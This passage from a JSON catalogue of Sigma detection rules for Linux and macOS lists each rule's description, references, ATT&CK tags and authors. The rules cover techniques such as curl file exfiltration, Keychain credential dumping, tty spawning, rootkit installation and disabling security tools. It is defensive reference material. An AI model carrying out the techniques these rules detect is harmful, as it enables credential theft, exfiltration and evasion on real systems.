"proc_creation_lnx_omigod_scx_runasprovider_executescript.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "level": "high", - "falsepositive": [ - "Legitimate use of SCX RunAsProvider ExecuteScript." 
- ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", - "uuid": "21541900-27a9-4454-9c4c-3f0a4240344a", - "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand", - "meta": { - "refs": [ - "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", - "https://github.com/Azure/Azure-Sentinel/pull/3059", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.initial_access", - "attack.execution", - "attack.t1068", - "attack.t1190", - "attack.t1203" - ], - "creation_date": "2021/10/15", - "filename": "proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "level": "high", - "falsepositive": [ - "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects process discovery commands. 
Adversaries may attempt to get information about running processes on a system.\nInformation obtained could be used to gain an understanding of common software/applications running on systems within the network\n", - "uuid": "4e2f5868-08d4-413d-899f-dc2f1508627b", - "value": "Process Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1057" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_lnx_process_discovery.yml", - "author": "\u00d6mer G\u00fcnal, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects setting proxy configuration", - "uuid": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c", - "value": "Connection Proxy", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1090/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1090" - ], - "creation_date": "2020/06/17", - "filename": "proc_creation_lnx_proxy_connection.yml", - "author": "\u00d6mer G\u00fcnal", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects python spawning a pretty tty", - "uuid": "c4042d54-110d-45dd-a0e1-05c47822c937", - "value": "Python Spawning Pretty TTY", - "meta": { - "refs": [ - "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/06/03", - "filename": "proc_creation_lnx_python_pty_spawn.yml", - "author": "Nextron Systems", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects the enumeration of other remote systems.", - "uuid": "11063ec2-de63-4153-935e-b1a8b9e616f1", - "value": "Linux Remote System Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018" - ], - "creation_date": "2020/10/22", - "filename": "proc_creation_lnx_remote_system_discovery.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. 
Detection will focus on crontab jobs uploaded from the tmp folder.", - "uuid": "6b14bac8-3e3a-4324-8109-42f0546a347f", - "value": "Scheduled Cron Task/Job - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1053.003" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_lnx_schedule_task_job_cron.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects usage of system utilities (only grep and egrep for now) to discover security software discovery", - "uuid": "c9d8b7fd-78e4-44fe-88f6-599135d46d60", - "value": "Security Software Discovery - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518.001" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_lnx_security_software_discovery.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects disabling security tools", - "uuid": "e3a8a052-111f-4606-9aee-f28ebeb76776", - "value": "Disabling Security Tools", - "meta": { - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ], - "creation_date": "2020/06/17", - "filename": "proc_creation_lnx_security_tools_disabling.yml", - "author": "\u00d6mer G\u00fcnal, Alejandro Ortuno, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services", - "uuid": "de25eeb8-3655-4643-ac3a-b662d3f26b6b", - "value": "Disable Or Stop Services", - "meta": { - "refs": [ - "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/09/15", - "filename": "proc_creation_lnx_services_stop_and_disable.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious change of file privileges with chown and chmod commands", - "uuid": "c21c4eaa-ba2e-419a-92b2-8371703cbe21", - "value": "Setuid and Setgid", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", - "https://attack.mitre.org/techniques/T1548/001/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml" - ], - 
"tags": [ - "attack.persistence" - ], - "creation_date": "2020/06/16", - "filename": "proc_creation_lnx_setgid_setuid.yml", - "author": "\u00d6mer G\u00fcnal", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", - "uuid": "f74107df-b6c6-4e80-bf00-4170b658162b", - "value": "Sudo Privilege Escalation CVE-2019-14287", - "meta": { - "refs": [ - "https://www.openwall.com/lists/oss-security/2019/10/14/1", - "https://access.redhat.com/security/cve/cve-2019-14287", - "https://twitter.com/matthieugarin/status/1183970598210412546", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.t1548.003", - "cve.2019.14287" - ], - "creation_date": "2019/10/15", - "filename": "proc_creation_lnx_sudo_cve_2019_14287.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects chmod targeting files in abnormal directory paths.", - "uuid": "6419afd1-3742-47a5-a7e6-b50386cd15f8", - "value": "Chmod Suspicious Directory", - "meta": { - "refs": [ - "https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.002" - ], - "creation_date": "2022/06/03", - "filename": "proc_creation_lnx_susp_chmod_directories.yml", - "author": "Christopher Peacock @SecurePeacock, SCYTHE 
@scythe_io", - "level": "medium", - "falsepositive": [ - "Admin changing file permissions." - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects a suspicious curl process start the adds a file to a web request", - "uuid": "00b90cc1-17ec-402c-96ad-3a8117d7a582", - "value": "Suspicious Curl File Upload - Linux", - "meta": { - "refs": [ - "https://twitter.com/d1r4c/status/1279042657508081664", - "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", - "https://curl.se/docs/manpage.html", - "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567", - "attack.t1105" - ], - "creation_date": "2022/09/15", - "filename": "proc_creation_lnx_susp_curl_fileupload.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Scripts created by developers and admins" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects a suspicious curl process start on linux with set useragent options", - "uuid": "b86d356d-6093-443d-971c-9b07db583c68", - "value": "Suspicious Curl Change User Agents - Linux", - "meta": { - "refs": [ - "https://curl.se/docs/manpage.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2022/09/15", - "filename": "proc_creation_lnx_susp_curl_useragent.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - 
"Scripts created by developers and admins", - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity", - "uuid": "1182f3b3-e716-4efa-99ab-d2685d04360f", - "value": "History File Deletion", - "meta": { - "refs": [ - "https://github.com/sleventyeleven/linuxprivchecker/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml" - ], - "tags": [ - "attack.impact", - "attack.t1565.001" - ], - "creation_date": "2022/06/20", - "filename": "proc_creation_lnx_susp_history_delete.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance", - "uuid": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66", - "value": "Print History File Contents", - "meta": { - "refs": [ - "https://github.com/sleventyeleven/linuxprivchecker/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml" - ], - "tags": [ - "attack.reconnaissance", - "attack.t1592.004" - ], - "creation_date": "2022/06/20", - "filename": "proc_creation_lnx_susp_history_recon.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" 
- } - }, - { - "description": "Detects suspicious interactive bash as a parent to rather uncommon child processes", - "uuid": "ea3ecad2-db86-4a89-ad0b-132a10d2db55", - "value": "Interactive Bash Suspicious Children", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml" - ], - "tags": "No established tags", - "creation_date": "2022/03/14", - "filename": "proc_creation_lnx_susp_interactive_bash.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate software that uses these patterns" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects java process spawning suspicious children", - "uuid": "d292e0af-9a18-420c-9525-ec0ac3936892", - "value": "Suspicious Java Children Processes", - "meta": { - "refs": [ - "https://www.tecmint.com/different-types-of-linux-shells/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/06/03", - "filename": "proc_creation_lnx_susp_java_children.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell", - "uuid": "880973f3-9708-491c-a77b-2a35a1921158", - "value": "Linux Shell Pipe to Shell", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140" - ], - "creation_date": "2022/03/14", - "filename": "proc_creation_lnx_susp_pipe_shell.yml", 
- "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate software that uses these patterns" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects events with patterns found in commands used for reconnaissance on linux systems", - "uuid": "0cf7a157-8879-41a2-8f55-388dd23746b7", - "value": "Linux Recon Indicators", - "meta": { - "refs": [ - "https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml" - ], - "tags": [ - "attack.reconnaissance", - "attack.t1592.004", - "attack.credential_access", - "attack.t1552.001" - ], - "creation_date": "2022/06/20", - "filename": "proc_creation_lnx_susp_recon_indicators.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects system information discovery commands", - "uuid": "42df45e7-e6e9-43b5-8f26-bec5b39cc239", - "value": "System Information Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ], - "creation_date": "2020/10/08", - "filename": "proc_creation_lnx_system_info_discovery.yml", - "author": "\u00d6mer G\u00fcnal, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects usage of system utilities to discover system network 
connections", - "uuid": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79", - "value": "System Network Connections Discovery - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_lnx_system_network_connections_discovery.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects enumeration of local network configuration", - "uuid": "e7bd1cfa-b446-4c88-8afb-403bcd79e3fa", - "value": "System Network Discovery - Linux", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1016" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_lnx_system_network_discovery.yml", - "author": "\u00d6mer G\u00fcnal and remotephone, oscd.community", - "level": "informational", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects execution of a the file \"execve_hijack\" which is used by the Triple Cross rootkit as a way to elevate privileges", - "uuid": "0326c3c8-7803-4a0f-8c5c-368f747f7c3e", - "value": "Triple Cross eBPF Rootkit Execve Hijack", - "meta": { - "refs": [ - 
"https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" - ], - "creation_date": "2022/07/05", - "filename": "proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script", - "uuid": "22236d75-d5a0-4287-bf06-c93b1770860f", - "value": "Triple Cross eBPF Rootkit Install Commands", - "meta": { - "refs": [ - "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1014" - ], - "creation_date": "2022/07/05", - "filename": "proc_creation_lnx_triple_cross_rootkit_install.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious sub processes of web server processes", - "uuid": "818f7b24-0fba-4c49-a073-8b755573b9c7", - "value": "Linux Webshell Indicators", - "meta": { - "refs": [ - "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/", - "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml" 
- ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ], - "creation_date": "2021/10/15", - "filename": "proc_creation_lnx_webshell_detection.yml", - "author": "Florian Roth, Nasreddine Bencherchali (update)", - "level": "high", - "falsepositive": [ - "Web applications that invoke Linux command line tools" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.", - "uuid": "23c43900-e732-45a4-8354-63e4a6c187ce", - "value": "MacOS Emond Launch Daemon", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", - "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.014" - ], - "creation_date": "2020/10/23", - "filename": "file_event_macos_emond_launch_daemon.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "file_event", - "logsource.product": "macos" - } - }, - { - "description": "Detects creation of startup item plist files that automatically get executed at boot initialization to establish persistence.", - "uuid": "dfe8b941-4e54-4242-b674-6b613d521962", - "value": "Startup Items", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_startup_items.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1037.005" - ], - 
"creation_date": "2020/10/14", - "filename": "file_event_macos_startup_items.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "file_event", - "logsource.product": "macos" - } - }, - { - "description": "Detects execution of AppleScript of the macOS scripting language AppleScript.", - "uuid": "1bc2e6c5-0885-472b-bed6-be5ea8eace55", - "value": "MacOS Scripting Interpreter AppleScript", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_applescript.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.002" - ], - "creation_date": "2020/10/21", - "filename": "proc_creation_macos_applescript.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "medium", - "falsepositive": [ - "Application installers might contain scripts as part of the installation process." 
- ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", - "uuid": "719c22d7-c11a-4f2c-93a6-2cfdd5412f68", - "value": "Decode Base64 Encoded Text -MacOs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_base64_decode.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_base64_decode.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. 
This rule detect using dd and truncate to add a junk data to file.", - "uuid": "95361ce5-c891-4b0a-87ca-e24607884a96", - "value": "Binary Padding - MacOS", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_binary_padding.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.001" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_binary_padding.yml", - "author": "Igor Fits, Mikhail Larin, oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate script work" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detect file time attribute change to hide new or changes to existing files", - "uuid": "88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0", - "value": "File Time Attribute Change", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_change_file_time_attr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.006" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_change_file_time_attr.yml", - "author": "Igor Fits, Mikhail Larin, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects deletion of local audit logs", - "uuid": "acf61bd8-d814-4272-81f0-a7a269aa69aa", - "value": "Indicator Removal on Host - Clear Mac System Logs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.002" - ], - "creation_date": "2020/10/11", - "filename": "proc_creation_macos_clear_system_logs.yml", - "author": "remotephone, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", - "uuid": "51719bf5-e4fd-4e44-8ba8-b830e7ac0731", - "value": "Creation Of A Local User Account", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" - ], - "tags": [ - "attack.t1136.001", - "attack.persistence" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_macos_create_account.yml", - "author": "Alejandro Ortuno, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option", - "uuid": "b22a5b36-2431-493a-8be1-0bae56c28ef3", - "value": "Hidden User Creation", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_hidden_account.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.002" - ], - "creation_date": 
"2020/10/10", - "filename": "proc_creation_macos_create_hidden_account.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects passwords dumps from Keychain", - "uuid": "b120b587-a4c2-4b94-875d-99c9807d6955", - "value": "Credentials from Password Stores - Keychain", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md", - "https://gist.github.com/Capybara/6228955", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.001" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_creds_from_keychain.yml", - "author": "Tim Ismilyaev, oscd.community, Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - "description": "Detects disabling security tools", - "uuid": "ff39f1a6-84ac-476f-a1af-37fcdf53d7c0", - "value": "Disable Security Tools", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_macos_disable_security_tools.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate activities" - ], - "logsource.category": "process_creation", - "logsource.product": "macos" - } - }, - { - 
